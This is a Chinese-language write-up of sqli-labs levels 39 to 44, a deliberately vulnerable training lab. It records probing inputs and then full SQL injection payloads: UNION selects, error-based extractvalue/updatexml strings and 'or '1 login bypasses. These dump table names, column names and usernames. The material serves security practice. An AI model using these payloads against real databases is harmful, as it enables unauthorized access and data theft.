sqli-labs(8)

39.

通过输入
1  成功
1' 报错
1" 报错
1 and 1=1 --+ 成功
1 and 1=2 --+ 失败
知道是数字型注入

-1 union select 1,2,3 --+

-1 union select 1,database(),3 --+

-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

-1 union select 1,(select group_concat(username) from security.users),3 --+

40.

1'and 1=1 --+ 失败

1"and 1=1 --+ 成功
1"and 1=2 --+ 成功

1') and 1=1 --+ 成功
1') and 1=2 --+ 失败

得到是‘）

-1')union select 1,2,3 --+

-1')union select 1,database(),3 --+

-1')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

-1')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

-1')union select 1,(select group_concat(username) from security.users),3 --+

41.

输入
1  成功
1' 无回显
1" 无回显
1 and 1=1 --+ 成功
1 and 1=2 --+ 无回显
得到是数字型注入

-1 union select 1,2,3 --+

-1 union select 1,database(),3 --+

-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 --+

-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 --+

-1 union select 1,(select group_concat(username) from security.users),3 --+

42.

在用户处输入
1' 显示用户错误
1" 显示用户错误
无注入点
在密码处输入
1' 页面返回报错信息
1'# 显示用户错误
得到1'# 注入点在密码处

使用报错注入

1'and(extractvalue(1,concat(0x5c,database())))#
1'and(updatexml(1,concat(0x7e,database(),0x7e),1))#

1'and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

1'and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#

1'and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))#
1'and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))#

43.

和上面一样测试

发现还有个括号

1’）#

1')and(extractvalue(1,concat(0x5c,database())))#
1')and(updatexml(1,concat(0x7e,database(),0x7e),1))#

1')and(extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='security'))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#

1')and(extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1))#

1')and(extractvalue(1,concat(0x5c,(select group_concat(username) from security.users))))#
1')and(updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1))# 

44.

这里不会返回报错信息不能通过报错信息来判断

这里通过or 1来判断

用户
'or '1 登录失败
"or "1 登录失败


密码
'or '1 登录成功
"or "1 登录失败

1'union select 1,database(),3 #

使用堆叠注入不用and or 了

1'union select 1,2,3 #

1'union select 1,database(),3 #

1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 #

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 #

1'union select 1,(select group_concat(username) from security.users),3 #